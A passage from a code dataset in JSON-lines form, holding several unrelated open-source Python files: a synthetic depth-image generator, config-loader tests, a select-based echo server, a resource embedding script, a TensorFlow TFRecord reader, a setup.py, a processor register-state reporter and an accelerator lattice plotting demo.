engine='gpu')\n if args.pattern_type == 'default':\n pyrenderer.mesh_proj(data, proj, pattern.copy(), d_alpha=0, d_beta=0.0)\n else:\n pyrenderer.mesh_proj(data, proj, pattern.copy(), d_alpha=0, d_beta=0.35)\n\n # get the reflected laser pattern $R$\n im = pyrenderer.color().copy()\n im = cv2.cvtColor(im, cv2.COLOR_RGB2GRAY)\n\n focal_length = K_processed[0, 0]\n depth = pyrenderer.depth().copy()\n disp = baseline * focal_length / depth\n\n # get the ambient image $A$\n ambient = pyrenderer.normal().copy()\n ambient = cv2.cvtColor(ambient, cv2.COLOR_RGB2GRAY)\n\n # get the noise free IR image $J$\n im = blend_im_rnd * im + (1 - blend_im_rnd) * ambient\n ret['ambient'].append(post_process(pattern_type, ambient)[None].astype(np.float32))\n\n # get the gradient magnitude of the ambient image $|\\nabla A|$\n ambient = ambient.astype(np.float32)\n sobelx = cv2.Sobel(ambient, cv2.CV_32F, 1, 0, ksize=5)\n sobely = cv2.Sobel(ambient, cv2.CV_32F, 0, 1, ksize=5)\n grad = np.sqrt(sobelx ** 2 + sobely ** 2)\n grad = np.maximum(grad - 0.8, 0.0) # parameter\n\n # get the local contract normalized grad LCN($|\\nabla A|$)\n grad_lcn, grad_std = lcn.normalize(grad, 5, 0.1)\n grad_lcn = np.clip(grad_lcn, 0.0, 1.0) # parameter\n ret['grad'].append(post_process(pattern_type, grad_lcn)[None].astype(np.float32))\n\n ret['im'].append(post_process(pattern_type, im)[None].astype(np.float32))\n ret['disp'].append(post_process(pattern_type, disp)[None].astype(np.float32))\n\n for key in ret.keys():\n ret[key] = np.stack(ret[key], axis=0)\n\n # save to files\n out_dir = out_root / f'{idx:08d}'\n out_dir.mkdir(exist_ok=True, parents=True)\n out_path = out_dir / f'frames.hdf5'\n with h5py.File(out_path, \"w\") as f:\n for k, val in ret.items():\n # f.create_dataset(k, data=val, compression=\"lzf\")\n f.create_dataset(k, data=val)\n\n print(f'create sample {idx + 1}/{n_samples} took {time.time() - tic}[s]')\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('pattern_type',\n help='Select the pattern file for projecting dots',\n default='default',\n choices=['default', 'kinect', 'real'], type=str)\n args = parser.parse_args()\n\n np.random.seed(42)\n\n # output directory\n config_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'config.json'))\n with open(config_path) as fp:\n config = json.load(fp)\n data_root = Path(config['DATA_DIR'])\n shapenet_root = config['SHAPENET_DIR']\n\n out_root = data_root\n out_root.mkdir(parents=True, exist_ok=True)\n\n # load shapenet models\n obj_classes = ['chair']\n objs = get_objs(shapenet_root, obj_classes)\n\n # camera parameters\n if args.pattern_type == 'real':\n fl_proj = 1112.1806640625\n fl = 1112.1806640625\n imsize_proj = (1280, 1080)\n imsize = (1280, 1080)\n imsize_processed = (512, 432)\n K_proj = np.array([[fl_proj, 0, 517.0896606445312], [0, fl_proj, 649.6329956054688], [0, 0, 1]], dtype=np.float32)\n K = np.array([[fl, 0, 517.0896606445312], [0, fl, 649.6329956054688], [0, 0, 1]], dtype=np.float32)\n baseline = 0.0246\n blend_im = 0.6\n noise = 0\n else:\n fl_proj = 1582.06005876\n fl = 435.2\n imsize_proj = (4096, 4096)\n imsize = (512, 432)\n imsize_processed = (512, 432)\n K_proj = np.array([[fl_proj, 0, 2047.5], [0, fl_proj, 2047.5], [0, 0, 1]], dtype=np.float32)\n K = np.array([[fl, 0, 216], [0, fl, 256], [0, 0, 1]], dtype=np.float32)\n baseline = 0.025\n blend_im = 0.6\n noise = 0\n\n # capture the same static scene from different view points as a track\n track_length = 4\n\n # load pattern image\n pattern = read_pattern_file(args.pattern_type, imsize_proj)\n\n x_cam = np.arange(0, imsize[1])\n y_cam = np.arange(0, imsize[0])\n x_mesh, y_mesh = np.meshgrid(x_cam, y_cam)\n x_mesh_f = np.reshape(x_mesh, [-1])\n y_mesh_f = np.reshape(y_mesh, [-1])\n\n grid_points = np.stack([x_mesh_f, y_mesh_f, np.ones_like(x_mesh_f)], axis=0)\n grid_points_mapped = K_proj.dot(np.linalg.inv(K).dot(grid_points))\n grid_points_mapped = grid_points_mapped / grid_points_mapped[2, :]\n\n x_map = np.reshape(grid_points_mapped[0, :], x_mesh.shape)\n y_map = np.reshape(grid_points_mapped[1, :], y_mesh.shape)\n x_map, y_map = x_map.astype('float32'), y_map.astype('float32')\n mapped_pattern = cv2.remap(pattern, x_map, y_map, cv2.INTER_LINEAR)\n\n pattern_processed, K_processed = post_process(args.pattern_type, mapped_pattern, K)\n # write settings to file\n settings = {\n 'imsize': imsize_processed,\n 'pattern': pattern_processed,\n 'baseline': baseline,\n 'K': K_processed,\n }\n out_path = out_root / f'settings.pkl'\n print(f'write settings to {out_path}')\n with open(str(out_path), 'wb') as f:\n pickle.dump(settings, f, pickle.HIGHEST_PROTOCOL)\n\n # start the job\n n_samples = 2 ** 10 + 2 ** 13\n # n_samples = 2048\n for idx in range(n_samples):\n parameters = (\n args.pattern_type, out_root, idx, n_samples, imsize_proj, imsize, pattern, K_proj, K, K_processed, baseline, blend_im, noise, track_length)\n create_data(*parameters)","repo_name":"idiap/DepthInSpace","sub_path":"data/create_syn_data.py","file_name":"create_syn_data.py","file_ext":"py","file_size_in_byte":10563,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"29"} +{"seq_id":"36858961600","text":"# -*- coding=utf-8\n\n\"\"\" Tests suite for dewyatochka.core.config.source.filesystem \"\"\"\n\nfrom os import path\n\nimport unittest\n\nfrom dewyatochka.core.config.source.filesystem import *\nfrom dewyatochka.core.config.exception import ReadError\n\n\n# Root path to config test files\n_CONFIG_FILES_ROOT = path.dirname(__file__) + '/../files/config'\n_CONFIG_FILES_ROOT_REAL = path.realpath(_CONFIG_FILES_ROOT)\n\n\nclass TestFilesystem(unittest.TestCase):\n \"\"\" Tests suite for dewyatochka.core.config.source.filesystem.Filesystem \"\"\"\n def test_files(self):\n \"\"\" Test directory scan \"\"\"\n class _VoidFilesystemSource(Filesystem):\n \"\"\" Filesystem abstract methods stubs \"\"\"\n file_extension = '.ini'\n\n def _do_read(self, files: list) -> dict:\n \"\"\" Abstract method stub \"\"\"\n return {}\n\n @property\n def files(self):\n \"\"\" Files list getter \"\"\"\n return self._files\n\n file = _CONFIG_FILES_ROOT_REAL + '/ini_file.ini'\n self.assertEqual(_VoidFilesystemSource(file).files, {file})\n\n directory = _CONFIG_FILES_ROOT_REAL + '/ini_directory'\n self.assertEqual(_VoidFilesystemSource(directory).files,\n {directory + '/test_config1.ini', directory + '/test_config2.ini'})\n\n self.assertRaises(IOError, _VoidFilesystemSource('/foo.bar').read)\n\n\nclass TestINIFiles(unittest.TestCase):\n \"\"\" Tests suite for dewyatochka.core.config.source.filesystem.INIFiles \"\"\"\n\n def test_do_read(self):\n \"\"\" Test configs parsing \"\"\"\n config = INIFiles(_CONFIG_FILES_ROOT + '/ini_file.ini').read()\n self.assertEqual({section: dict(config[section]) for section in config},\n {'section1': {'foo': 'bar'}})\n\n config = INIFiles(_CONFIG_FILES_ROOT + '/ini_directory/').read()\n self.assertEqual({section: dict(config[section]) for section in config},\n {'section1': {'foo': 'bar'}, 'section2': {'bar': 'baz'}})\n\n corrupted_source = INIFiles(_CONFIG_FILES_ROOT + '/corrupted_ini_file.ini')\n self.assertRaises(ReadError, corrupted_source.read)\n","repo_name":"kawashiro/dewyatochka2","sub_path":"test/cases/test_core_config_source_filesystem.py","file_name":"test_core_config_source_filesystem.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31857202571","text":"# encoding: utf-8 \n\n\"\"\" \n@version: v1.0 \n@author: Richard\n@license: Apache Licence \n@contact: billions.richard@qq.com \n@site: \n@software: PyCharm \n@file: selectServer.py \n@time: 2018/6/2 14:25 \n\"\"\"\nfrom pprint import pprint as P\nimport socket\nimport select\n\nserver_socket = socket.socket()\nserver_socket.bind(('127.0.0.1', 8080))\nserver_socket.listen(5)\n\nrlist = [server_socket, ]\n\nwhile True:\n r, w, s = select.select(rlist, [], []) # 水平触发\n\n for des in r:\n if des is server_socket:\n conn_sock, addr = des.accept()\n rlist.append(conn_sock) #将客户端通信的套接字放入��听列表中。\n else:\n client_data = conn_sock.recv(1024).decode('utf8')\n\n print('client<<<%s' % client_data)\n\n conn_sock.send(client_data.upper().encode('utf8'))\n\n\n\n print('>>>>>>>>')\n","repo_name":"BillionsRichard/pycharmWorkspace","sub_path":"python全栈3期/IO模型/selectServer.py","file_name":"selectServer.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5585677964","text":"srcdir = \"resources/\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import os\r\n import base64\r\n from glob import glob\r\n\r\n out = open(\"build/resources.cpp\", \"w\")\r\n\r\n lines = []\r\n lines.append(\"#include \\\"engine/resources.hpp\\\"\")\r\n lines.append(\"#include \")\r\n lines.append(\"\")\r\n files = [fn for fn in glob(f\"{srcdir}**\", recursive=True) if not os.path.isdir(fn)]\r\n\r\n # make resource arrays\r\n vars = list()\r\n\r\n lines.append(\"// RESOURCE ARRAYS\")\r\n\r\n for i, fn in enumerate(files):\r\n with open(fn, \"rb\") as f:\r\n # correct to relative filename (cut off res dir)\r\n fn = fn[len(srcdir):]\r\n\r\n # generate var name and content\r\n varname = f\"res_{i}\"\r\n data = [str(b) for b in f.read()]\r\n arr = \"{\" + \",\".join(data) + \"}\"\r\n\r\n lines.append(f\"static const unsigned char {varname}[] = {arr};\")\r\n vars.append((fn, varname, len(data)))\r\n lines.append(\"\")\r\n\r\n # make hashmap\r\n\r\n lines.append(\"// RESOURCE MAP\")\r\n lines.append(\"static const std::unordered_map res_map =\")\r\n lines.append(\"{\")\r\n\r\n for fn, name, size in vars:\r\n quotfn = \"\\\"\" + fn + \"\\\"\"\r\n line = \"\\t{\" + quotfn + \", {\" + f\".path={quotfn}, .data={name}, .size={size}\" +\"}},\"\r\n lines.append(line)\r\n\r\n lines.append(\"};\")\r\n lines.append(\"\")\r\n\r\n lines.append(\"// ACCESS METHOD\")\r\n lines.append(\"const Resource& Resource::load(const std::string& path) {return res_map.at(path);}\")\r\n\r\n out.write(\"\\n\".join(lines))\r\n\r\n\r\n","repo_name":"gabriel-gehrke/cpp-ecs-game-engine","sub_path":"scripts/make-resources.py","file_name":"make-resources.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12246556503","text":"import os\n\nimport tensorflow as tf\nfrom data_pipeline import tf_augmentations\n\ndef read_and_decode(filename_queue=[], is_training=False,\n batch_size=32, height=100, width=100,\n n_intermediate_frames=3,\n allow_smaller_final_batch=False):\n '''Reads batches of data from TF Records\n Args:\n filename_queue: 'List' that contains TF Records\n is_training: 'Bool' to specify training mode\n batch_size: 'Integer' to specify number of samples\n to be fetched in each iteration\n height: 'Integer' to specify the target height of\n each frame\n width: 'Interger' to specify the target width of\n each frame\n n_intermediate_frames: 'Interger' to mention the\n number of intermediate frames\n allow_smaller_final_batch: 'Bool' to specify whether\n the last batch is allowed to have samples < batch_size\n Returns:\n 'Tensors' of dtype tf.float32 containing batches of\n first, intermediate and last frames along with\n meta information\n '''\n reader = tf.TFRecordReader()\n _, ser = reader.read(\n filename_queue)\n\n keys_to_features = {\n 'data/first_frame': tf.FixedLenFeature(\n [],\n tf.string),\n 'data/last_frame': tf.FixedLenFeature(\n [],\n tf.string),\n 'data/intermediate_frames': tf.FixedLenFeature(\n [],\n tf.string),\n 'data/meta_file_names': tf.FixedLenFeature(\n [],\n tf.string)}\n\n parsed = tf.parse_single_example(\n ser,\n features=keys_to_features)\n\n fFrame = tf.decode_raw(\n parsed['data/first_frame'],\n tf.uint8)\n\n lFrame = tf.decode_raw(\n parsed['data/last_frame'],\n tf.uint8)\n\n iFrame = tf.decode_raw(\n parsed['data/intermediate_frames'],\n tf.uint8)\n\n meta_file_names = parsed['data/meta_file_names']\n\n # reshape images\n fFrame = tf.reshape(\n fFrame,\n [height, width, 1])\n\n lFrame = tf.reshape(\n lFrame,\n [height, width, 1])\n\n iFrame = tf.reshape(\n iFrame,\n [n_intermediate_frames, height, width, 1])\n\n # check flag for augmentations\n if is_training:\n fFrame, lFrame, iFrame = tf_augmentations.augment(\n fFrame,\n lFrame,\n iFrame)\n\n # cast images to float\n fFrame = tf.cast(fFrame, tf.float32)\n lFrame = tf.cast(lFrame, tf.float32)\n iFrame = tf.cast(iFrame, tf.float32)\n\n # pixels in range [-1, 1]\n fFrame = fFrame / 127.5 - 1.\n lFrame = lFrame / 127.5 - 1.\n iFrame = iFrame / 127.5 - 1.\n \n if is_training:\n fFrames, lFrames, iFrames, mfn = tf.train.shuffle_batch(\n [fFrame, lFrame, iFrame, meta_file_names],\n batch_size=batch_size,\n capacity=1000000,\n min_after_dequeue=10000,\n allow_smaller_final_batch=allow_smaller_final_batch,\n num_threads=4)\n\n else:\n fFrames, lFrames, iFrames, mfn = tf.train.batch(\n [fFrame, lFrame, iFrame, meta_file_names],\n batch_size=batch_size,\n capacity=10000,\n allow_smaller_final_batch=allow_smaller_final_batch,\n num_threads=2)\n\n return fFrames, lFrames, iFrames, mfn\n\n\ndef unit_test():\n '''Performs unit testing to validate efficiency of\n data input pipeline.\n '''\n current_path = os.path.join(\n '/neuhaus/movie/dataset',\n 'tf_records',\n 'slack_20px_fluorescent_window_5')\n\n filename = 'train.tfrecords'\n final_path = os.path.join(\n current_path,\n filename)\n\n with tf.Session().as_default() as sess:\n train_queue = tf.train.string_input_producer(\n [final_path], num_epochs=None)\n fFrames, lFrames, iFrames, mfns = read_and_decode(\n filename_queue=train_queue,\n is_training=True)\n\n init_op = tf.group(\n tf.global_variables_initializer(),\n tf.local_variables_initializer())\n sess.run(init_op)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(\n coord=coord)\n\n import time\n start = time.time()\n for i in range(200):\n fF, lF, iF, mFN = sess.run(\n [\n fFrames,\n lFrames,\n iFrames,\n mfns])\n\n print(fF.shape, lF.shape, iF.shape) #, mFN) \n\n print('Time taken:{} seconds.....'.format(\n str(\n round(\n time.time() - start,\n 3))))\n\n coord.request_stop()\n\n# unit_test()\n","repo_name":"RohitSaha/W-Cell-Net_cellular_video_interpolation","sub_path":"data_pipeline/read_record.py","file_name":"read_record.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"72617553999","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup, find_packages\nimport os\n\nwith open('./requirements.txt') as f:\n INSTALL_REQUIRES = f.read().splitlines()\n\n\ndef _get_version():\n from os.path import abspath, dirname, join\n filename = join(dirname(abspath(__file__)), 'rrgit', 'version.py')\n line = open(filename).read()\n return line.replace('VERSION=', '').strip().strip(\"'\")\n\nsetup(\n name=\"rrgit\",\n author=\"Adam Haile\",\n author_email=\"adammhaile@gmail.com\",\n version=_get_version(),\n description=\"CLI tool for syncing files to and from RepRapFirmware 3 via the web API\",\n long_description=open('README.md').read(),\n url=\"https://github.com/adammhaile/rrgit\",\n license=\"GNU General Public License v3 (GPLv3)\",\n packages=find_packages(exclude=[]),\n include_package_data=True,\n entry_points={\n 'console_scripts': [\n 'rrgit = rrgit:main',\n 'rrg = rrgit:main',\n ]\n },\n install_requires=INSTALL_REQUIRES,\n dependency_links=[],\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Natural Language :: English\",\n ]\n)","repo_name":"adammhaile/rrgit","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"29"} +{"seq_id":"37118048949","text":"import operator\nfrom collections import OrderedDict\nfrom csr.wheels.bitsandbobs import PureVirtualError\nfrom csr.dev.model.interface import Group, Table, Text, Warning as Warn\nfrom csr.dev.adaptor.text_adaptor import StringTextAdaptor\nfrom csr.dev.model.base_component import BaseComponent\nfrom csr.dev.hw.core.meta.io_struct_io_map_info import RegistersUnavailable\nfrom csr.dev.hw.register_field.register_field import bitz_engine\n\nclass BaseExecState(BaseComponent):\n \"\"\"\n Base class for execution states.\n \"\"\"\n\n def __init__(self, core):\n self.core = core\n\n def _generate_report_body_elements(self):\n raise PureVirtualError\n\n def __repr__(self):\n raise PureVirtualError\n\n\nclass KalimbaExecState(BaseExecState):\n \"\"\"\n Execution state of Kalimba cores.\n \"\"\"\n\n @property\n def r(self):\n 'Accessor to the Kalimba R register bank'\n #pylint: disable=invalid-name\n return self.core.r\n\n @property\n def i(self):\n 'Accessor to the Kalimba I register bank'\n return self.core.i\n\n @property\n def pc(self):\n 'Register accessor'\n return self.core.pc\n\n @property\n def sp(self):\n 'Register accessor'\n return self.core.sp\n\n @property\n def fp(self):\n 'Register accessor'\n return self.core.fp\n\n @property\n def rmac(self):\n \"\"\"\n rmac is a 72-bit value formed from two 32-bit registers and an 8-bit\n register\n \"\"\"\n return self.core.rmac\n\n @property\n def rlink(self):\n 'Accessor to the REGFILE_RLINK register'\n return self.core.rlink\n\n @property\n def core_regs_dict(self):\n \"\"\"\n Returns the core registers as a dictionary. Keys are lower case and of\n the basic form. i.e. REGFILE_R0 would have key of \"r0\"\n \"\"\"\n return self.core.core_regs_dict\n\n def _print_registers(self, report=False):\n \"\"\"\n Pretty print method for displaying the registers.\n\n p: report If False, then return output as a string. If True,\n then return a Group object (as used in reports)\n \"\"\"\n\n columns = ['field', 'bits', 'value']\n table = Table(headings=columns)\n\n for reg_name, value in self.core_regs_dict.items():\n reg = self.core.field_refs[\"REGFILE_{}\".format(reg_name.upper())]\n bits = \"[{}:{}]\".format(reg.info.start_bit, reg.info.stop_bit - 1)\n\n hex_padding = (reg.info.stop_bit - reg.info.start_bit) // 4\n hex_value = \"0x{:0{}x}\".format(value, hex_padding)\n\n row = [reg_name.upper(), bits, hex_value]\n table.add_row(row)\n\n output = Group(\"Kalimba Core Registers\")\n output.append(table)\n if report:\n return output\n return StringTextAdaptor(output)\n\n def _generate_report_body_elements(self):\n return [self._print_registers(report=True)]\n\n def __repr__(self):\n return self._print_registers()\n\n\nclass ArmExecState(BaseExecState):\n \"\"\"\n Execution state of ARM cores.\n \"\"\"\n\n @property\n def r(self):\n 'General indexable register'\n #pylint: disable=invalid-name\n return self.core.r\n\n @property\n def sp(self):\n 'Accessor to Stack Pointer (SP) register'\n return self.core.sp\n\n @property\n def lr(self):\n 'Accessor to Link Register (LR)'\n return self.core.lr\n\n @property\n def pc(self):\n 'Accessor to Program Counter (PC) register'\n return self.core.pc\n\n def _populate_registers(self, registers):\n \"\"\"\n Over-ridable that fills registers Ordered Dictionary with values\n ready for reporting in self._print_registers\n \"\"\"\n # Note that there are 3 specially named registers: SP, LR and PC\n for index in range(self.core.RegNames.NUM_UNNAMED_REGS):\n registers[\"r{}\".format(index)] = self.r[index]\n registers['sp'] = self.sp\n registers['lr'] = self.lr\n registers['pc'] = self.pc\n\n def _analyse_registers(self, registers, output):\n \"\"\"\n Analyse the register info and modify output by appending\n any appropriate anomalies to it.\n \"\"\"\n\n def _print_registers(self, report=False):\n \"\"\"\n Pretty print method for displaying the registers.\n\n p: report If False, then return output as a string. If True,\n then return a Group object (as used in reports)\n \"\"\"\n\n columns = ['field', 'bits', 'value', 'note']\n output = Group(\"ARM Core Registers\")\n table = Table(headings=columns)\n anomalies = []\n # Create dictionary mapping names to registers.\n # Special ones are chip-specific and added here as well.\n registers = OrderedDict()\n try:\n self._populate_registers(registers)\n except RegistersUnavailable:\n anomalies.append(Warn(\n 'ARM register definitions unavailable: '\n 'you may want to check why. \\n'\n 'This affects identification of '\n 'live_stack (needs PSP) and stack usage (needs PC). \\n'\n 'PC value of 0 will be falsely reported as possibly asleep.'))\n output.extend(anomalies)\n # abort processing\n else:\n output.extend(anomalies)\n for reg_name, value in registers.items():\n # All registers are 32 bit\n bits = \"0: 31\"\n if isinstance(value, tuple):\n value, note = value\n else:\n note = ''\n hex_value = \"0x{:0X}\".format(value)\n row = [reg_name.upper(), bits, hex_value, note]\n table.add_row(row)\n self._analyse_registers(registers, output)\n output.append(table)\n if report:\n return output\n return StringTextAdaptor(output)\n\n def _generate_report_body_elements(self):\n return [self._print_registers(report=True)]\n\n def __repr__(self):\n return self._print_registers()\n\nclass CortexM0ExecState(ArmExecState):\n \"\"\"\n Execution state of ARM CortexM0 cores.\n \"\"\"\n # Meanings of exception number in IPSR[0:6],\n # this holds the exception number or the current IRQ\n IPSR_EXCEPTION_IRQ0 = 16 # lowest value of exception number in IPSR\n IPSR_EXCEPTION_IRQ_COUNT = 32 # implementation defined number of IRQs\n # highest IRQ exception number in IPSR:\n IPSR_EXCEPTION_IRQ_MAX = IPSR_EXCEPTION_IRQ0 + IPSR_EXCEPTION_IRQ_COUNT\n IPSR_EXCEPTION_THREADMODE = 0\n IPSR_EXCEPTION_NMI = 2\n IPSR_EXCEPTION_HARDFAULT = 3\n IPSR_EXCEPTION_SVCALL = 11\n IPSR_EXCEPTION_PENDSV = 14\n IPSR_EXCEPTION_SYSTICK = 15\n _ipsr_exception_names = {\n 0:\"Thread mode\",\n 1:\"Reserved\",\n 2:\"NMI\",\n 3:\"HardFault\",\n 4:\"Reserved\",\n 5:\"Reserved\",\n 6:\"Reserved\",\n 7:\"Reserved\",\n 8:\"Reserved\",\n 9:\"Reserved\",\n 10:\"Reserved\",\n 11:\"SVCall\",\n 12:\"Reserved\",\n 13:\"Reserved\",\n 14:\"PendSV\",\n 15:\"SysTick\",\n 16:\"IRQ0\",\n # ... n+15 = IRQ(n-1); n is implementation defined; range 1-32\n # n .. 63, \"Reserved\"\n }\n\n def ipsr_exception_name(self, number):\n '''\n Looks up meaning of an IPSR exception number and returns a string\n describing it. This includes the IRQ bits.\n Does not read the value from register: it is supplied in number.\n '''\n try:\n return self._ipsr_exception_names[number]\n except KeyError:\n if self.IPSR_EXCEPTION_IRQ0 < number < self.IPSR_EXCEPTION_IRQ_MAX:\n # one-off population of rest of IRQ descriptors\n for i in range(\n self.IPSR_EXCEPTION_IRQ0,\n self.IPSR_EXCEPTION_IRQ0+self.IPSR_EXCEPTION_IRQ_COUNT):\n\n self._ipsr_exception_names[i] = (\"IRQ\" + str(\n i - self.IPSR_EXCEPTION_IRQ0))\n for i in range(\n self.IPSR_EXCEPTION_IRQ0+self.IPSR_EXCEPTION_IRQ_COUNT,\n 64):\n self._ipsr_exception_names[i] = \"Reserved\"\n return self._ipsr_exception_names[number]\n raise\n\n @property\n def xpsr(self):\n '''\n Accessor to CortexM0 combined extended program status register (XPSR),\n which combines APSR/EPSR/IPSR information.\n '''\n return self.core.xpsr\n\n @staticmethod\n def ipsr_exception(ipsr):\n '''\n The part of ipsr containing iPSR exception number is in bottom 6 bits.\n Does not read register; uses value passed in ipsr.\n '''\n # Potential extension:: need a better way of representing the bits in this register\n CORTEXM0_IPSR_EXCEPTION_MASK = 0x3F # pylint: disable=invalid-name\n return ipsr & CORTEXM0_IPSR_EXCEPTION_MASK\n\n @property\n def msp(self):\n 'Accessor to CortexM0 main stack pointer (MSP); banked in SP'\n return self.core.msp\n\n @property\n def psp(self):\n 'Accessor to CortexM0 process stack pointer (PSP); banked in SP'\n return self.core.psp\n\n @property\n def special(self):\n '''\n Accessor to CortexM0 special registers:\n PRIMASK/FAULTMASK/BASEPRI/CONTROL\n '''\n return self.core.special\n\n def dhcsr(self):\n 'Accessor to the Debug Halt Control Status Register (DHCSR)'\n return self.core.dhcsr\n\n def _analyse_registers(self, registers, output):\n \"\"\"\n Analyse the register info and modify output by appending\n any appropriate anomalies to it.\n \"\"\"\n #Get some register info (without re-reading register)\n dhcsr_reg = self.core.arm_regs.DHCSR\n if registers['dhcsr'] & dhcsr_reg.S_SLEEP.mask:\n output.append(Text(\n 'DHCSR.CORTEX_M0_S_SLEEP bit is set, hence many registers '\n 'are zero while the chip naps or sleeps: \\n'\n 'a value read at that instant would '\n 'be returned as zero.'))\n\n def _populate_registers(self, registers):\n \"\"\"\n Over-ridable that fills registers Ordered Dictionary with values\n ready for reporting in self._print_registers\n \"\"\"\n ArmExecState._populate_registers(self, registers)\n # There are more specially named registers to add here:\n xpsr = self.xpsr\n registers['xpsr'] = (xpsr, self.ipsr_exception_name(\n self.ipsr_exception(xpsr)))\n registers['msp'] = self.msp\n registers['psp'] = self.psp\n # The one between psp and special is reserved so not displayed\n registers['special'] = self.special\n # rest of banked registers are reserved so not displayed\n registers['dhcsr'] = self.core.dhcsr.read()\n\n def _generate_report_body_elements(self):\n output = self._print_registers(report=True)\n # Note that __repr__ doesn't give you this more detailed report\n\n # Here add DHCSR, maybe later add others like CONTROL and SPECIAL\n try:\n output.append(bitz_engine(\n self.core.dhcsr, report=True, value=self.core.dhcsr.read()))\n except RegistersUnavailable:\n output.append(Warning('DHCSR register definition unavailable'))\n else:\n if self.core.subsystem.chip.device.transport is None: # a coredump\n output.append(Text(\n 'Note this shows the saved value of DHCSR before coredump '\n 'halted the chip. \\nThe memory mapped register value in '\n 'bt.arm_regs.CORTEXM0_DCB_DHCSR may differ.'))\n\n return [output]\n\nclass XapExecState(BaseExecState):\n \"\"\"\n Execution state of XAP cores.\n \"\"\"\n # A lot of property names are named after register names which are usually\n # very short and upset pylint, so shut it up:\n #pylint: disable=invalid-name\n\n @property\n def pc(self):\n 'Accessor to Program Counter (PC) register'\n return self.core.pc\n\n @property\n def xl(self):\n 'Accessor to XL register'\n return self.core.xap_uxl\n\n @property\n def xh(self):\n 'Accessor to XH register'\n return self.core.xap_uxh\n\n @property\n def y(self):\n 'Accessor to Y register'\n return self.core.xap_uy\n\n @property\n def ah(self):\n 'Accessor to AH register'\n return self.core.xap_ah\n\n @property\n def al(self):\n 'Accessor to AL register'\n return self.core.xap_al\n\n def _print_registers(self, report=False):\n \"\"\"\n Pretty print method for displaying the registers.\n\n p: report If False, then return output as a string. If True,\n then return a Group object (as used in reports)\n \"\"\"\n\n columns = ['field', 'bits', 'value']\n t = Table(headings=columns)\n\n reg_sizes = OrderedDict()\n reg_sizes['uxl'] = 16\n reg_sizes['uxh'] = 8\n reg_sizes['uy'] = 16\n reg_sizes['al'] = 16\n reg_sizes['ah'] = 16\n reg_sizes['ixl'] = 16\n reg_sizes['ixh'] = 8\n reg_sizes['iy'] = 16\n\n for reg_name, length in sorted(reg_sizes.items(),\n key=operator.itemgetter(0)):\n reg = self.core.fields[\"XAP_{}\".format(reg_name.upper())]\n # xap registers are 16 bit\n bits = \"[0:{}]\".format(length - 1)\n\n hex_value = \"0x{:04x}\".format(reg)\n\n row = [reg_name.upper(), bits, hex_value]\n t.add_row(row)\n\n t.add_row(['PC', \"[0:23]\", \"0x{:08x}\".format(self.pc)])\n\n output = Group(\"XAP Core Registers\")\n output.append(t)\n if report:\n return output\n return StringTextAdaptor(output)\n\n def _generate_report_body_elements(self):\n return [self._print_registers(report=True)]\n\n def __repr__(self):\n return self._print_registers()\n","repo_name":"xiaokun9/qcc_tool","sub_path":"venv/Lib/site-packages/csr/dev/hw/core/execution_state.py","file_name":"execution_state.py","file_ext":"py","file_size_in_byte":14048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"21395711878","text":"\"\"\"\n\n.. _demo-accelerator-lattice:\n\n===================\nAccelerator Lattice\n===================\n\nThis example shows how to use the `~.plotting.lattice.plot_latwiss` function\nto represent your machine's layout and optics functions in a double-axis plot.\n\nIn this example, we will showcase the functionality on a simple lattice, and then demonstrate the use\nof several parameters to control the plot on the example case of the LHC.\n\"\"\"\nimport matplotlib.pyplot as plt\n\nfrom cpymad.madx import Madx\n\nfrom pyhdtoolkit.cpymadtools import lhc, matching\nfrom pyhdtoolkit.cpymadtools._generators import LatticeGenerator\nfrom pyhdtoolkit.plotting.lattice import plot_latwiss\nfrom pyhdtoolkit.plotting.styles import _SPHINX_GALLERY_PARAMS\nfrom pyhdtoolkit.utils import logging\n\nlogging.config_logger(level=\"error\")\nplt.rcParams.update(_SPHINX_GALLERY_PARAMS) # for readability of this tutorial\n\n###############################################################################\n# Let's start by generating a simple lattice and setup your simulation:\n\nn_cells: int = 24\nbase_lattice: str = LatticeGenerator.generate_base_cas_lattice()\n\nmadx = Madx(stdout=False)\nmadx.input(base_lattice)\n\nmatching.match_tunes_and_chromaticities(\n madx,\n sequence=\"CAS3\",\n q1_target=6.335,\n q2_target=6.29,\n dq1_target=100,\n dq2_target=100,\n varied_knobs=[\"kqf\", \"kqd\", \"ksf\", \"ksd\"],\n)\n\n###############################################################################\n# Plotting the combined machine layout and optics functions is done in a single call\n# to the `~.plotting.lattice.plot_latwiss` function. Here, we will also set the *k0l_lim*\n# parameter to control the right-hand-side axis in the machine layout axis. The same\n# can be done with the *k1_lim* parameter.\n\nmu_x_cell = madx.table.summ.Q1[0] / n_cells\nmu_y_cell = madx.table.summ.Q2[0] / n_cells\ntitle = rf\"Base Lattice, $\\mu_{{x, cell}}={mu_x_cell:.3f}, \\ \\mu_{{y, cell}}={mu_y_cell:.3f}$\"\n\nplt.figure(figsize=(18, 11))\nplot_latwiss(madx, title=title, k0l_lim=(-0.15, 0.15), k1l_lim=(-0.08, 0.08), disp_ylim=(-10, 125), 